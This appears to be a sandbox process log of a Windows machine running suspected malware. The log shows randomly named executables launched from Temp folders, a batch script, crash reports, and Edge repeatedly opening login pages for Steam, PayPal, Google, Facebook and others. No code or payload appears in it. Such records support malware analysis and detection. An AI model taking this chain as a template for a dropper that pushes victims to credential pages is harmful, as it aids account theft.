"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,1877569950297962887,17771826107555253530,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,7100226488549161167,7149096524213436967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,1877569950297962887,17771826107555253530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x168,0x16c,0x144,0x170,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x144,0x170,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\F7BE.exe
C:\Users\Admin\AppData\Local\Temp\F7BE.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Si4SR7iQ.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Si4SR7iQ.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\kn6Lv6zN.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\kn6Lv6zN.exe
C:\Users\Admin\AppData\Local\Temp\F926.exe
C:\Users\Admin\AppData\Local\Temp\F926.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EX9zq3Ho.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EX9zq3Ho.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HQ2ER5na.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HQ2ER5na.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FA6F.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1cJ14rw7.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1cJ14rw7.exe
C:\Users\Admin\AppData\Local\Temp\FBD8.exe
C:\Users\Admin\AppData\Local\Temp\FBD8.exe
C:\Users\Admin\AppData\Local\Temp\FCE2.exe
C:\Users\Admin\AppData\Local\Temp\FCE2.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Users\Admin\AppData\Local\Temp\FF45.exe
C:\Users\Admin\AppData\Local\Temp\FF45.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ql467Em.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ql467Em.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6252 -ip 6252
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Users\Admin\AppData\Local\Temp\243.exe
C:\Users\Admin\AppData\Local\Temp\243.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
